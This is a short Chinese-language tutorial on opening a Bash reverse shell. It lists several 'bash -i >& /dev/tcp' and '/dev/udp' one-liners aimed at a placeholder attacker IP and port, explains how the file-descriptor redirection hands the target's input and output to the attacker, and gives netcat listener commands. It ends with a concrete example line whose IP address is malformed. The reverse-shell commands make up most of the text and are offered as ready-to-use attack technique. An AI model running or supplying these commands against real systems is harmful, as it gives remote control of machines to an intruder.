Bash反弹shell

Shell也称为终端或壳，是人与内核之间的翻译官，而Bash则是Linux中默认使用的Shell

Bash 反弹Shell的命令如下：

bash -i >&/dev/tcp/攻击机_IP/攻击机端口  0>&1
bash -i >&/dev/tcp/攻击机_IP/攻击机端口  0>&2 
bash -i >&/dev/udp/攻击机_IP/攻击机端口  0>&1 
bash -i >&/dev/udp/攻击机_IP/攻击机端口  0>&2

“&”符号用于区分文件和文件描述符，”>&”符号后面跟文件时，表示将标准输出和标准错误输出重定向至文 件，”>&”符号后面跟数字时表示后面的数字是文件描述符，不加”&”符号则会把后面的数字当成文件。数 字”0″,”1″,”2″是LinuxShell下的文件描述符， “0”是指标准输入重定向， “1”是指标准输出重定向， “2”是指错误输出 重定向。

“/dev”目录下”tcp”和”udp”是Linux中的特殊设备，可用于建立Socket连接，读写这俩文件就相当于是在Socket连 接中传输数据。”>&/dev/tcp/攻击机_ip/攻击机端口”则表示将标准输出和标准错误输出重定向到”/dev/tcp/攻击机 ip/攻击机端口”文件中，也就是重定向到了攻击机，这时目标机的命令执行结果可以从攻击机看 到。”0>&1″或”0>&2″又将标准输入重定向到了标准输出，而标准输出重定向到了攻击机，因此标准输入也就重定 向到了攻击机，从而可以通过攻击机输入命令，并且可以看到命令执行结果输出

1. 攻击机器使用nc执行监听命令

nc -lvvp 9999 监听  TCP
nc -lup 9999     监听UDP

bash -i >&/dev/tcp/192.168..101.6/9999 0>&1